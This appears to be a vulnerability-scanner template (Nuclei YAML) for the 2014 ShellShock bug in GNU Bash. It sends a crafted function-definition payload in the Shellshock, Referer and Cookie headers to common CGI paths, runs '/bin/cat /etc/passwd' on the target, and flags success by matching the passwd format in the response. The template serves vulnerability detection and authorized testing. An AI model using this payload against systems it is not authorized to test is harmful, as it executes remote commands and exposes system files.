50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: CVE-2014-6271
|
|
|
|
info:
|
|
name: ShellShock - Remote Code Execution
|
|
author: pentest_swissky,0xelkomy
|
|
severity: critical
|
|
description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-6271
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-7169
|
|
- http://www.kb.cert.org/vuls/id/252743
|
|
- http://www.us-cert.gov/ncas/alerts/TA14-268A
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2014-6271
|
|
cwe-id: CWE-78
|
|
tags: cve,cve2014,rce,shellshock,kev
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
- "{{BaseURL}}/cgi-bin/status"
|
|
- "{{BaseURL}}/cgi-bin/stats"
|
|
- "{{BaseURL}}/cgi-bin/test"
|
|
- "{{BaseURL}}/cgi-bin/status/status.cgi"
|
|
- "{{BaseURL}}/test.cgi"
|
|
- "{{BaseURL}}/debug.cgi"
|
|
- "{{BaseURL}}/cgi-bin/test-cgi"
|
|
|
|
headers:
|
|
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
|
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
|
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
# Enhanced by mp on 2022/02/25
|